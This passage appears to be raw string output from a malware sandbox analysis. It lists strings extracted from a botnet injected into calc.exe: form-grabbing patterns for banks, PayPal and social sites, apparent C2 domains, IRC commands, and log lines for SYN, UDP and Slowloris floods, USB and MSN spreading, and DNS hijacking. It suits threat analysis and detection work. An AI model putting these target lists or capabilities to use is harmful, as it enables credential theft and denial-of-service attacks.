>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated 
upload speed %d KB/s</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>URLDownloadToFileW</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>RegNotifyChangeKeyValue</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP 
spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>{A5DCBF10-6530-11D2-901F-00C04FB951ED}</pre><pre>shlwapi.dll</pre><pre>crypt32.dll</pre><pre>wtsapi32.dll</pre><pre>samcli.dll</pre><pre>netutils.dll</pre><pre>userenv.dll</pre><pre>WindowsSecondaryDesktop</pre><pre>\charmap.exe</pre><pre>\Windows Media 
Player\wmprph.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>Aadvapi32.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><b>calc.exe_2704:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>hhctrl.ocx</pre><pre>CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32</pre><pre>calc.pdb</pre><pre>j.OXO</pre><pre>_acmdln</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>name="Microsoft.Windows.Shell.calc"</pre><pre>version="5.1.0.0"</pre><pre><description>Windows Shell</description></pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>CalcMsgPumpWnd</pre><pre>The requested operation may take a very long time to complete.</pre><pre>Do you want to let the calculation continue, or stop the operation now?</pre><pre>Windows Calculator application file</pre><pre>5.1.2600.0 (xpclient.010817-1148)</pre><pre>CALC.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.0</pre><pre>Operation was canceled.-Calc does not have enough memory to continue.eThe 
requested function may take a very long time to complete.</pre><pre>Do you want to abort the operation now?</pre><pre>calc.hlp</pre><pre>Cannot open Clipboard.TThere is not enough memory for data.</pre><pre>calc.chm</pre><b>calc.exe_2704_rwx_000A0000_00002000:</b><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>ajwqk.exe</pre><pre>121qd.exe</pre><pre>nj82s.exe</pre><pre>s7j8m.exe</pre><pre>btdh7.exe</pre><pre>uori0.exe</pre><pre>z4fs5.exe</pre><pre>wa2hh.exe</pre><pre>dbza6.exe</pre><pre>7rbku.exe</pre><pre>go686.exe</pre><pre>aabgw.exe</pre><pre>bdcm1.exe</pre><pre>kz2x8.exe</pre><pre>0pnze.exe</pre><pre>vg1o4.exe</pre><pre>8zskw.exe</pre><pre>dhwte.exe</pre><pre>8rpc8.exe</pre><pre>user32.dll</pre><pre>urlmon.dll</pre><pre>URLDownloadToFileA</pre><pre>wininet.dll</pre><pre>http://www.google.com</pre><b>calc.exe_2704_rwx_00AB0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG 
%5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</p
re><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed 
%d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: 
%d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre>
<pre>%s.Blocked "%S" from creating 
"%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploa
ded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to 
"%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS 
%s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
